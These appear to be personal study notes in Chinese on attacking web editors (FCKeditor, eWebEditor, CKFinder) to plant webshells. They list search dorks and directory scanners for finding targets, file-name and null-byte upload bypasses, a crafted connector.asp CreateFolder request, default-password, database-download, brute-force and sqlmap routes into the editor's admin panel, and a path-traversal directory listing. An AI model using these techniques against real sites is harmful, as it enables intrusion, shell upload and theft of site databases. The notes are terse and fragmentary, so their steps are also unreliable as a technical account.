常见编辑器漏洞详解
FCKeditor编辑器利用
EWEBeditor编辑器利用
其他类型编辑器的利用
编辑器利用:
南方:->southidceditor
eweb(一般在根目录或者管理员目录下)
ckeditor
fck
ckfinder
信息搜集->御剑
搜到后会有一个eweb...目录,,也可能叫edit,editor
信息搜集->caidao 去爬取
UploadFiles.
百度搜索:inurl:fckeditor /*site:xxx.com*/
漏洞利用->Fckeidtor
*****自己写安全工具一定不要外传,是犯法的.
Fckeidtor上传的话,一定要有反应才行.
1.asp;jpg->上传成功后复制链接->访问->找到图片的地址,然后访问.
小迪版本->上传地址2如果弹窗的话就不能使用了
上传地址3->上传上去"."就换成下划线的
就用突破建立文件夹:
(这段代码其实就是抓的包)
FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
第一行: %2F就是一个 "/"
将%2F 替换成 aa.asp
2.6版本 用 %2Fxx.php%00截断.(在URL里面不需要转换)
jsp用K8的FCK
EWEB编辑器:
它有独立的后台,与网站的后台无关.
/ewebeditor/
1.进EWEB后台
2.找后台 admin_style.asp
3.登陆:
(1)默认密码
(2)下载mdb数据库
(3)burp加载字典爆破
(4)注入
可以加个%23ewebeditor.mdb ,然后下载
数据管理->DatabaseBrow...(也就是辅臣数据库浏览器)
信息收集->御剑->找有eweb的url
然后sqlmap跑这个网址 ,如果已经知道数据库名的,就加载到字典里面,在python27->sqlmap->txt里面找
(还可以用穿山甲)
蚂蚁神盾???跟警方合作???(什么乱七八糟的)
aaspsp这样的写法是要过滤掉中间的asp
有时候按钮不好使是浏览器兼容性的问题
漏洞分析->ietester->这个是低版本的测试浏览器
没有后台就找列目录漏洞
如果能找到admin_uploadfile.asp的话就:
editor/admin_uploadfile.asp?id=&dir=../..
来列目录
构造上传:
寻找到在数据库里面改好的上传后缀的id
form->?style="改好的id"
ckfinder:
/ckfinder/ckfinder.html
右击创建子目录,上传文件,右击->查看元素就可以shell了
解析漏洞.